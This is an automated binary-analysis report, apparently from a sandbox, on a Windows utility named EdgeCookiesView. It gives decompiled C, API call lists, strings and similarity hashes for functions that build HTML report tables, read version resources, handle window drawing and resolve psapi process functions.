0x0040dd01
0x0040dd02
0x0040dd0f
0x0040dd14
0x0040dd14
0x0040dd17
0x0040dd1d
0x0040dd2c
0x0040dd2d
0x0040dd38
0x0040dd3d
0x0040dd3e
0x0040dd4b
0x0040dd50
0x0040dd59
0x0040dd5f
0x0040dd63
0x0040dd6b
0x0040dd71
0x0040dd76
0x0040dd80
0x0040dd88
0x0040dd8e
0x0040dd92
0x0040dd9a
0x0040dda0
0x0040dda6

APIs

memset.MSVCRT ref: 0040DC9B
memset.MSVCRT ref: 0040DCB0
wcscpy.MSVCRT ref: 0040DCE2
_snwprintf.MSVCRT ref: 0040DD02
wcscat.MSVCRT ref: 0040DD0F
_snwprintf.MSVCRT ref: 0040DD3E
wcscat.MSVCRT ref: 0040DD4B
wcscat.MSVCRT ref: 0040DD59
wcscat.MSVCRT ref: 0040DD6B
wcscat.MSVCRT ref: 0040DD76
wcscat.MSVCRT ref: 0040DD88
wcscat.MSVCRT ref: 0040DD9A

Strings

size="%d", xrefs: 0040DCF1
<font, xrefs: 0040DCDC
</b>, xrefs: 0040DD82
color="#%s", xrefs: 0040DD2D
<b>, xrefs: 0040DD65
</font>, xrefs: 0040DD94

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
Instruction ID: c1522ee0e6335da557e9dda04135524704fc8f14ed906b709f088109683ecb65
Opcode Fuzzy Hash: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
Instruction Fuzzy Hash: 213184B2D04306AEE720AA959C82A6B73B99F44714F10817FF215B21C2DB7859889A18

Uniqueness

Uniqueness Score: -1.00%

Function 00408C24, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t151;
				intOrPtr* _t152;
				signed int _t154;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t151 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t159 = _t157 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
				if(_t87 != 0xffffffff) {
					_t128 =  &_v964;
					_push(E0040DBA9(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040DFD6();
					_t159 = _t159 + 0x18;
				}
				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t151;
				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
						_v12 = _t154;
						_t155 = _t154 * 0x14;
						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t151;
						_t152 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
						E0040DBA9(_v32,  &_v348);
						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
						} else {
							_push( *(_t155 + _v16 + 0x10));
							_push(E0040DBA9(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x70));
							L0040DFD6();
							_t159 = _t159 + 0x14;
						}
						_t109 =  *(_t124 + 0x6c);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
							_pop(_t128);
						}
						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
						_push( *((intOrPtr*)(_t124 + 0x74)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x70));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x68)));
						L0040DFD6();
						_t159 = _t159 + 0x28;
						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
							goto L14;
						}
						_t151 = 0;
					}
				}
				L14:
				E00408857(_t124, _t128, _a4, L"</table><p>");
				return E00408857(_t124, _t128, _a4, L"\r\n");
			}

0x00408c24
0x00408c2d
0x00408c45
0x00408c4c
0x00408c58
0x00408c5a
0x00408c5c
0x00408c68
0x00408c6f
0x00408c7e
0x00408c85
0x00408c94
0x00408c9b
0x00408ca2
0x00408ca7
0x00408cad
0x00408cb3
0x00408cb6
0x00408cb8
0x00408cc5
0x00408cc6
0x00408cd1
0x00408cd3
0x00408cd4
0x00408cd9
0x00408cd9
0x00408ce6
0x00408cee
0x00408cf1
0x00408cfb
0x00408d01
0x00408d07
0x00408d0a
0x00408d11
0x00408d1f
0x00408d25
0x00408d28
0x00408d2c
0x00408d30
0x00408d38
0x00408d3b
0x00408d46
0x00408d53
0x00408d69
0x00408d79
0x00408d86
0x00408dc0
0x00408d88
0x00408d8b
0x00408d9e
0x00408d9f
0x00408da4
0x00408da9
0x00408dac
0x00408db1
0x00408db1
0x00408dc7
0x00408dca
0x00408dd0
0x00408dde
0x00408de4
0x00408de4
0x00408dee
0x00408df3
0x00408dfc
0x00408e03
0x00408e04
0x00408e0d
0x00408e14
0x00408e15
0x00408e1a
0x00408e1d
0x00408e22
0x00408e2d
0x00408e32
0x00408e3b
0x00000000
0x00000000
0x00408cf9
0x00408cf9
0x00408cfb
0x00408e41
0x00408e4b
0x00408e62

APIs

memset.MSVCRT ref: 00408C45
memset.MSVCRT ref: 00408C6F
memset.MSVCRT ref: 00408C85
memset.MSVCRT ref: 00408C9B
_snwprintf.MSVCRT ref: 00408CD4
wcscpy.MSVCRT ref: 00408D1F
_snwprintf.MSVCRT ref: 00408DAC
wcscat.MSVCRT ref: 00408DDE

Part of subcall function 0040DBA9: _snwprintf.MSVCRT ref: 0040DBCD

wcscpy.MSVCRT ref: 00408DC0
_snwprintf.MSVCRT ref: 00408E1D

Strings

<font color="%s">%s</font>, xrefs: 00408D9F
<table border="1" cellpadding="5">, xrefs: 00408CDC
nowrap, xrefs: 00408D19
 , xrefs: 00408DD8
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 00408C4D
bgcolor="%s", xrefs: 00408CC6
</table><p>, xrefs: 00408E41

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409190, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t75 = __ecx;
				E0040E340(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040DBA9(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040DFD6();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040DBA9(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040DFD6();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040DFD6();
				_t80 = _t79 + 0x10;
				E00408857(_a4, _t75, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040DFD6();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040DFD6();
						_t80 = _t81 + 0x1c;
						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

0x00409190
0x00409198
0x004091af
0x004091b6
0x004091c4
0x004091cb
0x004091d9
0x004091e0
0x004091e5
0x004091ec
0x004091fd
0x004091fe
0x00409209
0x0040920e
0x0040920f
0x00409214
0x00409214
0x0040921b
0x0040922c
0x0040922d
0x00409238
0x0040923d
0x0040923e
0x0040924f
0x00409254
0x00409254
0x0040925d
0x0040925e
0x00409269
0x0040926e
0x0040926f
0x00409274
0x00409284
0x00409289
0x0040928e
0x00409298
0x0040929b
0x0040929e
0x004092a7
0x004092ae
0x004092b3
0x004092b5
0x004092bb
0x004092d9
0x004092bd
0x004092bd
0x004092be
0x004092c9
0x004092ce
0x004092cf
0x004092d4
0x004092d4
0x004092e6
0x004092e7
0x004092f0
0x004092f7
0x004092f8
0x00409303
0x00409308
0x00409309
0x0040930e
0x0040931e
0x00409323
0x00409326
0x00409326
0x00409326
0x00000000
0x0040932f
0x00409333

APIs

memset.MSVCRT ref: 004091B6
memset.MSVCRT ref: 004091CB
memset.MSVCRT ref: 004091E0
_snwprintf.MSVCRT ref: 0040920F
_snwprintf.MSVCRT ref: 0040923E
wcscpy.MSVCRT ref: 0040924F
_snwprintf.MSVCRT ref: 0040926F
memset.MSVCRT ref: 004092AE
_snwprintf.MSVCRT ref: 004092CF
_snwprintf.MSVCRT ref: 00409309

Part of subcall function 0040DBA9: _snwprintf.MSVCRT ref: 0040DBCD

Strings

<table border="1" cellpadding="5"><tr%s>, xrefs: 0040925E
<font color="%s">, xrefs: 0040922D
<th%s>%s%s%s, xrefs: 004092F8
width="%s", xrefs: 004092BE
bgcolor="%s", xrefs: 004091FE
</font>, xrefs: 00409249

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407297, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040E340(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00405800( &_v532);
				_pop(_t44);
				E0040674D( &_v5164);
				_t27 = E0040DE36( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x412c38, _a8);
				wcscpy(0x412e48, L"general");
				E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);
				E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
				E00406DE5(_t61, L"Version",  &_v1044, 1);
				E00406DE5(_t61, L"RTL", "0", 0);
				_t13 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t13, 4, E00407047, 0);
				_t14 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t14, 5, E00407047, 0);
				wcscpy(0x412e48, L"strings");
				_t38 = E00407170(_t44, _t61, _a4);
				 *0x412c38 =  *0x412c38 & 0x00000000;
				return _t38;
			}

0x0040729f
0x004072b6
0x004072bd
0x004072d2
0x004072d9
0x004072e8
0x004072ed
0x004072f4
0x00407306
0x0040730b
0x0040730d
0x0040731d
0x00407323
0x00407323
0x0040732c
0x0040733c
0x0040734d
0x0040735e
0x00407374
0x00407387
0x0040739e
0x004073a1
0x004073a8
0x004073ab
0x004073b3
0x004073bb
0x004073c3
0x004073cf

APIs

memset.MSVCRT ref: 004072BD
memset.MSVCRT ref: 004072D9

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11

wcscpy.MSVCRT ref: 0040731D
wcscpy.MSVCRT ref: 0040732C
wcscpy.MSVCRT ref: 0040733C
EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
wcscpy.MSVCRT ref: 004073B3

Strings

RTL, xrefs: 00407382
TranslatorName, xrefs: 00407348
Version, xrefs: 0040736F
H.A, xrefs: 00407336
strings, xrefs: 004073AD
TranslatorURL, xrefs: 00407359
;t@, xrefs: 0040739E, 004073A8
general, xrefs: 00407331

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2223684028
Opcode ID: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
Instruction ID: 5f8ecd76274f380d0de7cb04729dc73bacf1b7add2d1f3ba80cfb94e375ef893
Opcode Fuzzy Hash: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
Instruction Fuzzy Hash: 27217872A4021875C730B7529C46FCF3B6CDF44758F14047BB90CB60D2E6F96A988AAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040B813, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 190
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t69;
				void* _t75;
				void* _t97;
				signed int _t105;
				void* _t108;
				intOrPtr _t115;
				signed char _t120;
				signed int _t124;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr* _t134;
				signed int _t136;
				void* _t139;

				_t129 = __ecx;
				_t118 = _a4;
				_t139 = _t118 - 0x402;
				_v8 = __ecx;
				if(_t139 > 0) {
					_t60 = _t118 - 0x415;
					__eflags = _t60;
					if(_t60 == 0) {
						E0040A459(__ecx);
						_t132 = _t129;
						L31:
						__eflags = 0;
						E0040A1DC(0, _t118, _t132, 0);
						L32:
						_t64 =  *((intOrPtr*)(_t129 + 0x6a0));
						if(_t64 != 0 && _a4 == _t64) {
							_t127 = _a12;
							_t120 =  *(_a12 + 0xc);
							_t148 = _t120 & 0x00000008;
							_t66 =  *((intOrPtr*)(_t129 + 0x69c));
							if((_t120 & 0x00000008) == 0) {
								__eflags = _t120 & 0x00000040;
								if((_t120 & 0x00000040) != 0) {
									 *0x412c2c =  *0x412c2c & 0x00000000;
									__eflags =  *0x412c2c;
									E004077CB(_t66);
								}
							} else {
								E0040990D(_t66, _t148, _t127);
							}
						}
						return E00401B1E(_t129, _a4, _a8, _a12);
					}
					_t69 = _t60 - 1;
					__eflags = _t69;
					if(_t69 == 0) {
						_t134 = __ecx + 0x69c;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();
						_t118 =  *_t134;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
						L22:
						_t132 = _t129;
						E0040A3BF(_t129);
						goto L31;
					}
					_t75 = _t69 - 0x12;
					__eflags = _t75;
					if(__eflags == 0) {
						E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
					} else {
						__eflags = _t75 - 0x41;
						if(__eflags == 0) {
							memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);
							E0040B00A(_t129);
						}
					}
					goto L32;
				}
				if(_t139 == 0) {
					_t38 = __ecx + 0x280;
					 *_t38 =  *(__ecx + 0x280) & 0x00000000;
					__eflags =  *_t38;
					goto L22;
				}
				if(_t118 == 6) {
					__eflags = _a8 - 1;
					if(__eflags == 0) {
						PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
					}
					goto L32;
				}
				if(_t118 == 0xc) {
					__eflags = E0040546C(_a12, L"EdgeCookiesView");
					if(__eflags == 0) {
						goto L32;
					}
					return 0;
				}
				if(_t118 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
					return 1;
				}
				if(_t118 == 0x2b) {
					_t115 = _a12;
					__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					__eflags =  *(__ecx + 0x694);
					if(__eflags != 0) {
						L14:
						SetBkMode( *(_t115 + 0x18), 1);
						SetTextColor( *(_t115 + 0x18), 0xff0000);
						_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t131 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
						SelectObject( *(_t131 + 0x18), _t97);
						_t129 = _v8;
						goto L32;
					}
					_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
					asm("cdq");
					_t124 = 0x60;
					_t136 = _t105 * 0xe / _t124;
					_t108 =  *(__ecx + 0x694);
					__eflags = _t108;
					if(__eflags != 0) {
						DeleteObject(_t108);
						_t16 = __ecx + 0x694;
						 *_t16 =  *(__ecx + 0x694) & 0x00000000;
						__eflags =  *_t16;
					}
					 *(_t129 + 0x694) = E004058D4(_t136);
					goto L14;
				} else {
					if(_t118 == 0x7b) {
						_t126 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
							E0040B607(__ecx, _t126);
						}
					}
					goto L32;
				}
			}

0x0040b81c
0x0040b81e
0x0040b826
0x0040b828
0x0040b82b
0x0040b9cd
0x0040b9cd
0x0040b9d2
0x0040ba34
0x0040ba39
0x0040ba3b
0x0040ba3b
0x0040ba3d
0x0040ba42
0x0040ba42
0x0040ba4a
0x0040ba51
0x0040ba54
0x0040ba57
0x0040ba5a
0x0040ba60
0x0040ba6c
0x0040ba6f
0x0040ba71
0x0040ba71
0x0040ba78
0x0040ba78
0x0040ba62
0x0040ba65
0x0040ba65
0x0040ba60
0x00000000
0x0040ba88
0x0040b9d4
0x0040b9d4
0x0040b9d5
0x0040ba17
0x0040ba21
0x0040ba24
0x0040ba2a
0x0040b9c2
0x0040b9c2
0x0040b9c4
0x00000000
0x0040b9c4
0x0040b9d7
0x0040b9d7
0x0040b9da
0x0040ba10
0x0040b9dc
0x0040b9dc
0x0040b9df
0x0040b9f9
0x0040ba03
0x0040ba03
0x0040b9df
0x00000000
0x0040b9da
0x0040b831
0x0040b9bb
0x0040b9bb
0x0040b9bb
0x00000000
0x0040b9bb
0x0040b83a
0x0040b996
0x0040b99b
0x0040b9b0
0x0040b9b0
0x00000000
0x0040b99b
0x0040b843
0x0040b985
0x0040b989
0x00000000
0x00000000
0x00000000
0x0040b98f
0x0040b84c
0x0040b94c
0x0040b952
0x00000000
0x00000000
0x0040b96a
0x00000000
0x0040b972
0x0040b855
0x0040b881
0x0040b887
0x0040b88d
0x00000000
0x00000000
0x0040b893
0x0040b89a
0x0040b8d7
0x0040b8dc
0x0040b8ea
0x0040b8ff
0x0040b908
0x0040b909
0x0040b90a
0x0040b90b
0x0040b90c
0x0040b927
0x0040b92e
0x0040b935
0x0040b93f
0x0040b941
0x00000000
0x0040b941
0x0040b8a1
0x0040b8aa
0x0040b8ad
0x0040b8b0
0x0040b8b2
0x0040b8b8
0x0040b8ba
0x0040b8bd
0x0040b8c3
0x0040b8c3
0x0040b8c3
0x0040b8c3
0x0040b8d1
0x00000000
0x0040b857
0x0040b85a
0x0040b866
0x0040b86f
0x0040b877
0x0040b877
0x0040b86f
0x00000000
0x0040b85a

APIs

GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
DeleteObject.GDI32(00000000), ref: 0040B8BD
SetBkMode.GDI32(?,00000001), ref: 0040B8DC
SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
SelectObject.GDI32(?,00000000), ref: 0040B8FF
DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
SelectObject.GDI32(00000014,00000000), ref: 0040B93F

Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F

GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
LoadCursorW.USER32(00000000,00000067), ref: 0040B963
SetCursor.USER32(00000000), ref: 0040B96A
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
memcpy.MSVCRT ref: 0040B9F9

Strings

EdgeCookiesView, xrefs: 0040B978

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
String ID: EdgeCookiesView
API String ID: 1858646182-2656830938
Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA5A, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CA5A() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x413260 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryW(L"psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
					 *0x4128e8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x4128e0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
							 *0x4128d8 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x412b0c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x4128e4 = _t2;
									if(_t2 != 0) {
										 *0x413260 = 1;
									}
								}
							}
						}
					}
					if( *0x413260 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}

0x0040ca61
0x0040caf1
0x0040caf1
0x0040ca6d
0x0040ca73
0x0040ca77
0x0040caf0
0x00000000
0x0040ca79
0x0040ca86
0x0040ca8a
0x0040ca8f
0x0040ca97
0x0040ca9b
0x0040caa0
0x0040caa8
0x0040caac
0x0040cab1
0x0040cab9
0x0040cabd
0x0040cac2
0x0040caca
0x0040cace
0x0040cad3
0x0040cad5
0x0040cad5
0x0040cad3
0x0040cac2
